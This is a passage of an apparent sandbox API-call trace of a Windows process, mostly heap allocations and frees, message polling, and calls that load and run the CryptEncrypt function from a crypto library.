Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.254] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.254] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.255] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.255] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0259.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.255] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.256] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0259.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xda0a) returned 0x2f3ce58 [0259.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3ce58 | out: hHeap=0x970000) returned 1 [0259.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51be0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.271] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.271] CryptEncrypt (in: hKey=0xa87390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xda0a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xda10) returned 1 [0259.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.272] CharLowerBuffW (in: lpsz="byte[55824]", cchLength=0xb | out: lpsz="byte[55824]") returned 0xb [0259.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.282] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.282] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 